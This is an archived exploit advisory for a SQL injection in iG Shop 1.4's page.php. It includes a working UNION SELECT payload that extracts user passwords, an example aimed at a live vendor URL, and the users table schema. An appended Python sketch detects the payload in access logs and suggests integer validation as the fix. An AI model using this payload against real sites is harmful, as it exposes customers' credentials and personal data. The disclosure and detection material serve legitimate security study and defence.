iG Shop 1.4 - 'page.php' SQL Injection

EDB-ID: 3907
Author: gsy
Type: webapps
Platform: PHP
Date: 2007-05-12


Discovered by: gsy & kerem125
Website: www.kerem125.com

Script Download: http://www.igeneric.co.uk/ig-shopping-cart.html

exploit: /shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*

example: http://shop.igeneric.co.uk/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*

contact: by_gsy@hotmail.com & kerem125@kerem125.com
Special thanks to: by_emr3, ercu_145, bolivar, voltigore, f10

# user_id int(11) NOT NULL auto_increment,
# fname varchar(50) NOT NULL default '',
# lname varchar(50) NOT NULL default '',
# email varchar(100) NOT NULL default '',
# password varchar(100) NOT NULL default '',
# salutation varchar(5) NOT NULL default '',
# bill_address varchar(200) NOT NULL default '',
# bill_address_2 varchar(100) NOT NULL default '',
# bill_city varchar(50) NOT NULL default '',
# bill_post_code varchar(15) NOT NULL default '',
# bill_country varchar(20) NOT NULL default '',
# bill_phone varchar(15) NOT NULL default '',
# ship_address varchar(200) NOT NULL default '',
# ship_address_2 varchar(100) NOT NULL default '',
# ship_city varchar(50) NOT NULL default '',
# ship_post_code varchar(15) NOT NULL default '',
# ship_country varchar(20) NOT NULL default '',
# ship_phone varchar(15) NOT NULL default '',

# milw0rm.com [2007-05-12]
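
Detection sketch for the request shown above, added here as an example and not part of the original advisory: it scans web access logs for page.php requests whose type_id[] value is not a plain integer. It assumes combined-format access logs and that legitimate type_id values are non-negative integer ids; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request target inside an Apache/nginx "combined" access-log line.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# type_id, type_id[] or type_id[0] (keys are compared after URL-decoding).
KEY_RE = re.compile(r"type_id(\[[^\]]*\])?")
# Assumption: legitimate type_id values are non-negative integer ids.
ID_RE = re.compile(r"\d+")


def bad_type_ids(log_line):
    """Return decoded type_id values in a page.php request that are not plain ids."""
    m = REQ_RE.search(log_line)
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    if not path.endswith("/page.php"):
        return []
    return [value
            for key, value in parse_qsl(query, keep_blank_values=True)
            if KEY_RE.fullmatch(key) and not ID_RE.fullmatch(value)]


def scan(lines):
    """Return (line_number, offending_values) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        bad = bad_type_ids(line)
        if bad:
            hits.append((n, bad))
    return hits


# Constructed sample log lines (documentation IP range); line 2 carries the
# request string published in this advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/May/2007:10:00:01 +0000] "GET /shop/page.php'
    '?page_type=catalog_navigate&type_id[]=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/May/2007:10:00:07 +0000] "GET /shop/page.php'
    '?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/'
    'password/**/from/**/users/* HTTP/1.1" 200 811',
    '203.0.113.5 - - [12/May/2007:10:00:09 +0000] "GET /shop/page.php'
    '?page_type=catalog_navigate&type_id%5B%5D=7 HTTP/1.1" 200 4999',
]

if __name__ == "__main__":
    for n, values in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric type_id {values!r}")
```

The same integer-only rule, enforced in the application before the value reaches the SQL query (together with a parameterized query), is the corresponding fix on the server side.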